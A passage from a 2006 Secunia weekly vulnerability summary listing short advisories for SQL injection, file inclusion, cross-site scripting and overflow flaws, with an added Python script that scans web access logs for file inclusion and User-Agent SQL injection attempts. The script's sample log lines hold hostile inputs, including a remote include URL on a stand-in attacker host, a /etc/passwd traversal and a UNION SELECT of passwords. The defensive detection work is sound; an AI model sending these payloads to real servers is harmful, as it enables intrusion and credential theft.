information or cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/21303/

 --

[SA21297] GnuPG "parse_comment" Denial of Service Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-08-02

Evgeny Legerov has reported a vulnerability in GnuPG, which can be
exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/21297/

 --

[SA21293] XMB "u2uid" SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-08-02

rgod has discovered a vulnerability in XMB, which can be exploited by
malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/21293/

 --

[SA21287] vbPortal "bbvbplang" Local File Inclusion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, System access
Released:    2006-08-02

R00t[ATI] has reported a vulnerability in vbPortal, which can be
exploited by malicious people to disclose sensitive information and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21287/

 --

[SA21286] Ajax Chat Cross-Site Scripting and Information Disclosure

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Exposure of sensitive information
Released:    2006-07-31

Sirdarckcat has discovered two vulnerabilities in Ajax Chat, which can
be exploited by malicious people to conduct cross-site scripting
attacks and disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/21286/

 --

[SA21283] xpoll "poll" Parameter SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-07-31

Sirdarckcat has discovered a vulnerability in xpoll, which can be
exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/21283/

 --

[SA21282] X-Protection protect.php SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-07-31

Sirdarckcat has discovered some vulnerabilities in X-Protection, which
can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/21282/

 --

[SA21281] X-Statistics "User-Agent" HTTP Header SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-07-31

SirDarckCat has discovered a vulnerability in X-Statistics, which can
be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/21281/

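Several advisories in this issue share one root cause: a PHP application that passes a request parameter straight into include() (the "NL_PATH", "news_include_path", "sb_include_path", "dwl_include_path", "tsep_config[absPath]", "myng_root", "data_basepath" and "bbvbplang" entries above), and SA21281 shows the same injection class carried in an HTTP header rather than the query string. The following triage helper is an added example written for this summary, not code from Secunia or from any of the affected projects. It assumes Apache/nginx "combined" access log lines, takes the parameter names from the advisory titles, uses the constructed sample lines embedded in the block, and treats its pattern matches as indicators for follow-up, not proof of compromise.

```python
"""Added example: access-log triage for the file inclusion and User-Agent
SQL injection advisories in this issue (not code from Secunia or from the
affected projects).

Assumptions: Apache/nginx "combined" log format; the parameter names come
from the advisory titles; the regexes are heuristics for triage only.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names from the advisory titles. Matched case-insensitively and
# after URL-decoding, so "tsep_config%5BabsPath%5D" is recognised as well.
INCLUDE_PARAMS = {
    "nl_path", "news_include_path", "sb_include_path", "dwl_include_path",
    "tsep_config[abspath]", "myng_root", "data_basepath", "bbvbplang",
}

# Combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A URL scheme in an include path means PHP's include() would fetch and run
# remote code (remote file inclusion). Traversal, a NUL byte or a php://
# wrapper points at local file inclusion or file disclosure instead.
REMOTE_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)
LOCAL_RE = re.compile(r'(\.\./|^php://|\x00|%00)', re.IGNORECASE)

# User-Agent SQL injection indicators: a quote followed by a SQL keyword,
# UNION SELECT, or a comment sequence used to truncate the original query.
SQLI_RE = re.compile(
    r"('\s*(?:or|and|union|select)\b|\bunion\s+select\b|--|/\*)",
    re.IGNORECASE,
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    entry = m.groupdict()
    query = urlsplit(entry["path"]).query
    # parse_qsl URL-decodes names and values once, as PHP does for $_GET.
    entry["params"] = [(k.lower(), v)
                       for k, v in parse_qsl(query, keep_blank_values=True)]
    entry["ua"] = unquote(entry["ua"])
    return entry


def classify(entry):
    """Return [(rule, detail), ...] for a parsed entry; empty if nothing fired."""
    findings = []
    for name, value in entry["params"]:
        if name not in INCLUDE_PARAMS:
            continue
        if REMOTE_RE.match(value):
            findings.append(("rfi", f"{name}={value}"))
        elif LOCAL_RE.search(value):
            findings.append(("lfi", f"{name}={value}"))
    if SQLI_RE.search(entry["ua"]):
        findings.append(("ua_sqli", entry["ua"]))
    return findings


def scan(lines):
    """Return [(ip, path, findings), ...] for every line that trips a rule."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry["ip"], entry["path"], findings))
    return hits


# Constructed sample lines (not real traffic); addresses are RFC 5737
# documentation ranges. The trailing "?" on the injected URL is the usual
# trick to neutralise whatever the script appends to the include path.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Aug/2006:10:15:32 +0000] "GET /newsletter/nl.php?NL_PATH=http://203.0.113.9/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [02/Aug/2006:10:15:40 +0000] "GET /shoutbox/shoutbox.php?sb_include_path=http://203.0.113.9/c.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [02/Aug/2006:10:16:01 +0000] "GET /portal/index.php?bbvbplang=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "curl/7.15"',
    '198.51.100.8 - - [02/Aug/2006:10:16:30 +0000] "GET /stats/index.php HTTP/1.1" 200 100 "-" "Mozilla/5.0\' UNION SELECT user,password FROM users-- "',
    '192.0.2.10 - - [02/Aug/2006:10:17:00 +0000] "GET /newsletter/nl.php?page=2 HTTP/1.1" 200 900 "http://example.test/" "Mozilla/5.0 (X11; Linux)"',
]

if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, path, findings)
```

Run it against a real log with `scan(open("access.log"))`; a 200 response to an "rfi" hit is the line to chase first, since it means the server fetched the attacker's file rather than rejecting the request. The header check is deliberately loose: logs that escape quotes in the User-Agent field (Apache writes `\"`) need the LOG_RE adjusted, and any "--" or "/*" hit should be read in context before it is escalated.
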
 --

[SA21267] Open Cubic Player Multiple Buffer Overflows

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-08-01

Luigi Auriemma has reported some vulnerabilities in Open Cubic Player,
which can be exploited by malicious people to compromise a user's
system.

Full Advisory:
http://secunia.com/advisories/21267/

 --

[SA21251] Sun Java System Application Server / Web Server File
Disclosure

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of system information, Exposure of sensitive
information
Released:    2006-07-28

A vulnerability has been reported in Sun Java System Application Server
(SJSAS) and Sun Java System Web Server (SJSWS), which can be exploited
by malicious people to gain knowledge of sensitive information.

Full Advisory:
http://secunia.com/advisories/21251/

 --

[SA21301] Informix Dynamic Server Multiple Vulnerabilities

Critical:    Moderately critical
Where:       From local network
Impact:      Exposure of sensitive information, DoS, System access
Released:    2006-08-01

Multiple vulnerabilities have been reported in Informix Dynamic Server,
which can be exploited by malicious users to cause a DoS (Denial of
Service), gain knowledge of sensitive information, or compromise the
system.

Full Advisory:
http://secunia.com/advisories/21301/

 --

[SA21257] Osiris Format String Vulnerabilities

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2006-07-31

Ulf Harnhammar and Max Vozeler have reported some vulnerabilities in
Osiris, which can be exploited by malicious people to cause a DoS
(Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21257/

 --

[SA21296] AWBS Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-07-31

newbinaryfile has reported two vulnerabilities in AWBS, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/21296/

 --

[SA21242] Taskjitsu Cross-Site Scripting and Script Insertion
Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-07-31

Some vulnerabilities have been reported in Taskjitsu, which can be
exploited by malicious users to conduct script insertion attacks and by
malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/21242/

 --

[SA21239] Dokeos Unspecified Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-07-28

Some vulnerabilities have been reported in Dokeos, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/21239/

 --

[SA21237] GeoClassifieds Enterprise Cross-Site Scripting
Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-07-31

Ellipsis Security has reported some vulnerabilities in GeoClassifieds
Enterprise, which can be exploited by malicious people to conduct
cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/21237/

 --

[SA21235] TWiki "TYPEOF" Arbitrary Command Execution Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2006-07-27

Ben Wheeler has reported a vulnerability in TWiki, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/21235/

 --

[SA21230] VMware ESX Server Multiple Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Hijacking, Cross Site Scripting, Exposure of sensitive
information
Released:    2006-08-01

Corsaire has reported some vulnerabilities in VMware ESX Server, which
can be exploited to gain knowledge of potentially sensitive information
or conduct cross-site request forgery attacks.

Full Advisory:
http://secunia.com/advisories/21230/

 --

[SA21259] MySQL MERGE Table Privilege Revoke Bypass

Critical:    Not critical
Where:       From local network
Impact:      Security Bypass
Released:    2006-08-01

Peter Gulutzan has reported a vulnerability in MySQL, which can be
exploited by malicious users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/21259/



========================================================================

Secunia recommends that you verify all advisories you receive,
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web     : http://secunia.com/
E-mail  : support@secunia.com
Tel     : +45 70 20 51 44
Fax     : +45 70 20 51 45

========================================================================






